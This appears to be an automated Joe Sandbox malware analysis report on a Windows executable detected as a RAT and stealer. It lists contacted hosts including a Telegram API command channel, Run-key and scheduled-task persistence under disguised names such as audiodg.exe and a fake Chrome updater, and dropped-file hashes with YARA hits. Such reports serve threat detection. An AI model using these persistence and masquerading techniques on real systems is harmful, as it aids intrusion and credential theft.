00000008.00000003.2123172020.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2779737291.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/mail/	based.exe, 00000008.00000003.2112491572.000001F16CEFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
185.199.108.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1503002
Start date and time:	2024-09-02 16:49:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	102
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	iqA8j9yGcd.exe renamed because original name is a hash value
Original Sample Name:	06d1a9fd3099cfb0cc829db930ab25f75a532e5e670e1704844cf7b1000d6314.exe
Detection:	MAL
Classification:	mal100.rans.spre.troj.spyw.expl.evad.winEXE@169/133@5/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 57% Number of executed functions: 174 Number of non-executed functions: 241
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 172.217.18.99
Excluded domains from analysis (whitelisted): google.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: iqA8j9yGcd.exe

Simulations

Behavior and APIs

Time	Type	Description
10:50:02	API Interceptor	1x Sleep call for process: setup.exe modified
10:50:05	API Interceptor	125x Sleep call for process: powershell.exe modified
10:50:07	API Interceptor	78x Sleep call for process: main.exe modified
10:50:12	API Interceptor	1x Sleep call for process: WMIC.exe modified
10:50:51	API Interceptor	18x Sleep call for process: cmd.exe modified
10:50:51	API Interceptor	78x Sleep call for process: based.exe modified
10:50:51	API Interceptor	147482x Sleep call for process: WmiPrvSE.exe modified
10:50:51	API Interceptor	33x Sleep call for process: conhost.exe modified
16:50:15	Task Scheduler	Run new task: cmd path: "C:\Windows\Logs\SettingSync\cmd.exe"
16:50:15	Task Scheduler	Run new task: cmdc path: "C:\Windows\Logs\SettingSync\cmd.exe"
16:50:19	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
16:50:22	Task Scheduler	Run new task: audiodg path: "C:\Windows\Resources\audiodg.exe"
16:50:22	Task Scheduler	Run new task: audiodga path: "C:\Windows\Resources\audiodg.exe"
16:50:22	Task Scheduler	Run new task: biuvCXdylsCxguP path: "C:\Program Files (x86)\windows photo viewer\en-GB\biuvCXdylsCxguP.exe"
16:50:22	Task Scheduler	Run new task: biuvCXdylsCxguPb path: "C:\Program Files (x86)\windows photo viewer\en-GB\biuvCXdylsCxguP.exe"
16:50:24	Task Scheduler	Run new task: tasklist path: "C:\Users\user\3D Objects\tasklist.exe"
16:50:24	Task Scheduler	Run new task: tasklistt path: "C:\Users\user\3D Objects\tasklist.exe"
16:50:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Windows\Logs\SettingSync\cmd.exe"
16:50:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run audiodg "C:\Windows\Resources\audiodg.exe"
16:50:41	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run tasklist "C:\Users\user\3D Objects\tasklist.exe"
16:50:50	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run biuvCXdylsCxguP "C:\Program Files (x86)\windows photo viewer\en-GB\biuvCXdylsCxguP.exe"
16:50:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdate C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
16:51:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Windows\Logs\SettingSync\cmd.exe"
16:51:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run audiodg "C:\Windows\Resources\audiodg.exe"
16:51:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run tasklist "C:\Users\user\3D Objects\tasklist.exe"
16:51:32	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run biuvCXdylsCxguP "C:\Program Files (x86)\windows photo viewer\en-GB\biuvCXdylsCxguP.exe"
16:51:40	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdate C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
16:51:48	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Windows\Logs\SettingSync\cmd.exe"
16:51:56	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run audiodg "C:\Windows\Resources\audiodg.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	r7XXceHRzO.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	znwFR6hkn8.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Shipping Documents Cos090224.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	DOCUMENTS.vbs	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	PDF.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	Telegram.exe	Get hash	malicious	ZTrat	Browse	ip-api.com/xml/?fields=countryCode,query
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse	ip-api.com/json/?fields=225545
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse	ip-api.com/json/?fields=225545
	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse	ip-api.com/line/?fields=hosting
149.154.167.220	Setup_IDM.exe	Get hash	malicious	Fredy Stealer	Browse
	Setup_IDM.exe	Get hash	malicious	Fredy Stealer	Browse
	chiara.exe	Get hash	malicious	CryptOne, DarkTortilla, Mofksys, XWorm	Browse
	RFQ September Order PR 29235 doc-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	RFQ.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Unmovablety.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Request for Quotation #P01042.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.29312.2664.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.21943.32020.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Quote E68-STD-094.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
185.199.108.133	https://jwx.iountanic.com/4rGra/	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	https://cvccworks-my.sharepoint.com/:o:/g/personal/tbrosseau_cvccworks_edu/Eq-UyPVcAplCp0EtULhG-vgBSBG-0YnvqRHIOFaj8gAVeA?e=0GtZle&c=E,1,DChFGbEapD80-9FdFFEzIgnps7b6noVGZQKGJYQxe5NZ1bO4xoHQSXTZoDZYFQom26YXPkpXr4g-Zcy6HwaX1DHyE-5Bk2WBwo9od82Z27DPdBWYzulyG2zvnA,,&typo=1	Get hash	malicious	HTMLPhisher	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	https://www.linkedin.com/redir/redirect?url=https://assets-usa.mkt.dynamics.com/2143bba1-f463-ef11-a66d-6045bd003910/digitalassets/standaloneforms/3d28dcfa-8464-ef11-bfe2-0022480a9151&urlhash=OzMH&trk=article-ssr-frontend-pulse_little-text-block	Get hash	malicious	HTMLPhisher	Browse
	phish_alert_iocp_v1.4.48 (39).eml	Get hash	malicious	Tycoon2FA	Browse
	ATT09876.htm	Get hash	malicious	HTMLPhisher	Browse
	https://energyservices.org/	Get hash	malicious	HTMLPhisher	Browse
	SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exe	Get hash	malicious	Phemedrone Stealer	Browse
	http://yathuchandran.github.io/Metamask.clone	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	r7XXceHRzO.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	znwFR6hkn8.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Shipping Documents Cos090224.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DOCUMENTS.vbs	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	https://mukulkasana0001.github.io/netflix_clone	Get hash	malicious	HTMLPhisher	Browse	51.77.64.70
	PDF.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Telegram.exe	Get hash	malicious	ZTrat	Browse	208.95.112.1
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse	208.95.112.1
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse	208.95.112.1
raw.githubusercontent.com	Run First.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	Run First.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	soinjector.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	snhNDcl7l4.exe	Get hash	malicious	LummaC	Browse	185.199.111.133
	file.exe	Get hash	malicious	LummaC	Browse	185.199.108.133
	http://interface-git-main-uniswap.vercel.app/	Get hash	malicious	Unknown	Browse	185.199.109.133
	PDF To Excel Converter.exe	Get hash	malicious	LummaC, MicroClip	Browse	185.199.110.133
	Setup.exe	Get hash	malicious	LummaC	Browse	185.199.108.133
	2plugin27724.exe	Get hash	malicious	Xmrig	Browse	185.199.110.133
	UBONg7lmVR.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
api.telegram.org	Setup_IDM.exe	Get hash	malicious	Fredy Stealer	Browse	149.154.167.220
	Setup_IDM.exe	Get hash	malicious	Fredy Stealer	Browse	149.154.167.220
	chiara.exe	Get hash	malicious	CryptOne, DarkTortilla, Mofksys, XWorm	Browse	149.154.167.220
	RFQ September Order PR 29235 doc-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Unmovablety.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request for Quotation #P01042.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.29312.2664.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.21943.32020.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quote E68-STD-094.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Setup_IDM.exe	Get hash	malicious	Fredy Stealer	Browse	149.154.167.220
	Setup_IDM.exe	Get hash	malicious	Fredy Stealer	Browse	149.154.167.220
	chiara.exe	Get hash	malicious	CryptOne, DarkTortilla, Mofksys, XWorm	Browse	149.154.167.220
	RFQ September Order PR 29235 doc-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Unmovablety.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request for Quotation #P01042.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.29312.2664.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.21943.32020.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quote E68-STD-094.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
TUT-ASUS	r7XXceHRzO.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	znwFR6hkn8.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Shipping Documents Cos090224.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DOCUMENTS.vbs	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	PDF.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Telegram.exe	Get hash	malicious	ZTrat	Browse	208.95.112.1
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse	208.95.112.1
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse	208.95.112.1
	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse	208.95.112.1
FASTLYUS	SecuriteInfo.com.W32.PossibleThreat.16557.7011.msi	Get hash	malicious	Unknown	Browse	199.232.214.172
	ACH_Remittance_Copy_Thursday-8302024_16d4b35684bb4196eb8133664f36ad3e7a830549.html	Get hash	malicious	HTMLPhisher	Browse	104.244.43.131
	ListenNowMsgs000037Secs_wav229.html	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	Run First.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	Run First.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	https://rgbegx.blogspot.pe/	Get hash	malicious	GRQ Scam	Browse	151.101.194.208
	a5a5af3b-ae4b-2746-d08a-67229fed50bd.eml	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	http://10eurodisconto.com?rid=iVbb6Xl	Get hash	malicious	Unknown	Browse	151.101.194.137
	CQACAV8aYw.exe	Get hash	malicious	Amadey	Browse	185.199.111.133
	https://trackparcelonnlin.com/FPAPPP/	Get hash	malicious	Unknown	Browse	151.101.2.137

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Unknown	Browse	185.199.108.133 149.154.167.220
	tYPdrTU0ha.exe	Get hash	malicious	AgentTesla	Browse	185.199.108.133 149.154.167.220
	chiara.exe	Get hash	malicious	CryptOne, DarkTortilla, Mofksys, XWorm	Browse	185.199.108.133 149.154.167.220
	CONG TY TNHH RAISING VIETNAM - USD 5850.00pdf.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.199.108.133 149.154.167.220
	RFQ September Order PR 29235 doc-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.199.108.133 149.154.167.220
	Unmovablety.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	185.199.108.133 149.154.167.220
	http://unfortunatelydroopinglying.com	Get hash	malicious	Unknown	Browse	185.199.108.133 149.154.167.220
	Request for Quotation #P01042.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.199.108.133 149.154.167.220
	REMITTANCE ADVICE.exe	Get hash	malicious	AgentTesla	Browse	185.199.108.133 149.154.167.220
	https://q7ke.glitch.me/?e=mthatha@africawsp.co.za	Get hash	malicious	Unknown	Browse	185.199.108.133 149.154.167.220

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe	VaTlw2kNGc.exe	Get hash	malicious	Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	87Bym0x4Fy.exe	Get hash	malicious	Blank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRAT	Browse
	8Ck8T5qRcC.exe	Get hash	malicious	Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
C:\Program Files\Google\Chrome\updater.exe	VaTlw2kNGc.exe	Get hash	malicious	Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	87Bym0x4Fy.exe	Get hash	malicious	Blank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRAT	Browse
	8Ck8T5qRcC.exe	Get hash	malicious	Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	TS-240605-Millenium1.exe	Get hash	malicious	Blank Grabber, Discord Token Stealer, Millenuim RAT, Xmrig	Browse
	DevxExecutor.exe	Get hash	malicious	Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT	Browse
	hacn.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT, Xmrig	Browse

Created / dropped Files

C:\Program Files (x86)\Microsoft\Edge\Application\CSCD2DF9DC1BB554A3A91A2FCAEEB39352E.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.448520842480604
Encrypted:	false
SSDEEP:	24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5:	B5189FB271BE514BEC128E0D0809C04E
SHA1:	5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256:	E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512:	F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious:	false
Preview:	.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.893086082387686
Encrypted:	false
SSDEEP:	48:6dmRtWxZ8RxeOAkFJOcV4MKe28dPFzPvqBHruulB+hnqXSfbNtm:dhxvxVx9vFzPvkdTkZzNt
MD5:	971AFC541F2B45508AD69AE30BAEB34C
SHA1:	95894E3FD78BA84AED2516B4867D70C008843775
SHA-256:	D84349F9AF6CC071D1E9B34B1D8D49BEB6B6FBC752D1E9123B3832955A719A31
SHA-512:	A75BFDAEF5C22BF3A5A4C0327AEC7DA83C50424CFC9BED2B07BB4ABC1AA7AE9D68FD2B7219EA9494CBB2D19246017EFA7793DD4A7B1EF9691BE6480B78D678A1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<..f.............................'... ...@....@.. ....................................@.................................@'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(.....0..!.......r...pr...p.{....(....(....&..&......................0..........r...p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\Program Files (x86)\Windows Photo Viewer\en-GB\8239df6b3c91e5

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (444), with no line terminators
Category:	dropped
Size (bytes):	444
Entropy (8bit):	5.869132004902263
Encrypted:	false
SSDEEP:	12:RGxMVA42UcFwE20UCu0c4kRo7FfeDExhJrGStQen:QxpFwE2LAcjoZmIbJptQen
MD5:	0CA9418C42C723ECF12E4AF47052DA6E
SHA1:	7E512F74013CBCA85D846AC7B30425967CAAB3FF
SHA-256:	6092BBCA5C1D0F52D662772102FB8520AD6DA7721355FA3DD7978B48C82C4522
SHA-512:	A7A2C4170A8FD770B46ABAEB337EF351BB9858D9B9A218162207E0FD45EB15DD1A293C08ADA17B823B198702F6745634ACF4D3B143604C36F3095C6A8D75F375
Malicious:	false
Preview:	pxasCqcX2p8D1pb2zLDtlW8odjyLhhRnt7dHB3lA6Tbhrfvwqf7nfm0SzvOd2QzUYUU3LT16kDxR5a68xCfBknIGHKSPpIIpeGJXK1kXnADbyiXYyPpzvxtuMNwAAmQb5HxyRjx6bIYjjqRiw4bZcS3qXYK7FjWBtlgrvjGObtYnZJKf5OOFK19mNGa2Y001vW08KkwMxM7s4QQOOpB1VQ02m3dpJOzl3g2CTMVVbBS74Rs7zMoty9fef7VQGHDjXVzXXO5BTqZU838VKgz7jGw3BXgV0EOU7skibVjlRmZIkLgm9AFkRG9Rj5WArjKPcEWPSZ3z6Nq6qoTz14V08oC1tT9g9j4rcKpfyQUjHQnEaCk4mgIwNUQxCfg8aX0WT8ef8xAlkwtsB8bqsE3cbHdI32dTtVIuaQvbiE5zfhMbkiwDD0QWdX5LeVlG

C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Joe Sandbox View:	Filename: VaTlw2kNGc.exe, Detection: malicious, Browse Filename: 87Bym0x4Fy.exe, Detection: malicious, Browse Filename: 8Ck8T5qRcC.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\ProgramData\setup.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	7.71585644239634
Encrypted:	false
SSDEEP:	98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
MD5:	1274CBCD6329098F79A3BE6D76AB8B97
SHA1:	53C870D62DCD6154052445DC03888CDC6CFFD370
SHA-256:	BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
SHA-512:	A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: VaTlw2kNGc.exe, Detection: malicious, Browse Filename: 87Bym0x4Fy.exe, Detection: malicious, Browse Filename: 8Ck8T5qRcC.exe, Detection: malicious, Browse Filename: TS-240605-Millenium1.exe, Detection: malicious, Browse Filename: DevxExecutor.exe, Detection: malicious, Browse Filename: hacn.exe, Detection: malicious, Browse
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......\|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\42af1c969fbb7b

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (415), with no line terminators
Category:	dropped
Size (bytes):	415
Entropy (8bit):	5.751008641684603
Encrypted:	false
SSDEEP:	12:uuURewqwL9un+g+iHqi3dCriy6xgCD7obAoEVTC20eE:uu1wq+4Ci3dC2TxHDkbKTC20eE
MD5:	30A724B20C73031D6975BB6DFC1D3865
SHA1:	A0730F3F71EC7ED5757F3AF8EDB1103181A41326
SHA-256:	53EC021EEAD536AD970BA91C32F1C2C73C5259B822E429CB01FB23669F7E350A
